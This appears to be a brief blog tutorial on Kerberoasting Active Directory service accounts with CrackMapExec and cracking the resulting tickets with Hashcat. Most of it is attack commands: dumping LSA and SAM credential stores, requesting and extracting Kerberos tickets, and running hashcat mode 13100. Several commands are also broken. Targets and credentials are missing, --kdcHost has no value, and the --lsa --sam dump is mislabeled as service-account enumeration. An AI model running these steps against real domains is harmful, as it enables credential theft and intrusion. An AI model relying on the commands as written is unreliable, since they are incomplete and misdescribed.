Kerberoasting with CrackMapExec: A Comprehensive Guide

Kerberoasting with CrackMapExec: A Comprehensive Guide

How to Perform Kerberoasting Using CrackMapExec


1 min read

roasting is a type of attack that exploits the way Microsoft Active Directory handles service accounts. In this article, we will explore how to perform Kerberoasting with CrackMapExec, a powerful penetration testing tool.

We will cover the basics of Kerberos authentication, how Kerberoasting works, and how to use CrackMapExec to extract Kerberos tickets and crack them.

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.

Enumerate service accounts with CrackMapExec

crackmapexec smb -u -p --lsa --sam

Use CrackMapExec to request a TGS for a service account

crackmapexec smb -u -p --kerberos


Extract the encrypted Kerberos ticket with CrackMapExec

crackmapexec ldap -u -p --kdcHost --kerberoasting KERBEROASTING

Crack the encrypted Kerberos ticket with Hashcat

hashcat -m 13100 <ticket_file> <wordlist_file>
hashcat -m13100 output.txt wordlist.txt

Note: Hashcat is not included in CrackMapExec and needs to be installed separately.

By following these steps, you can easily perform Kerberoasting with CrackMapExec and extract Kerberos tickets from service accounts.

Remember, always use penetration testing tools ethically and with permission, and never use them to harm or exploit others.

Read the Full CrackMapExec Guide Here: A Swiss Army knife for Pentesting networks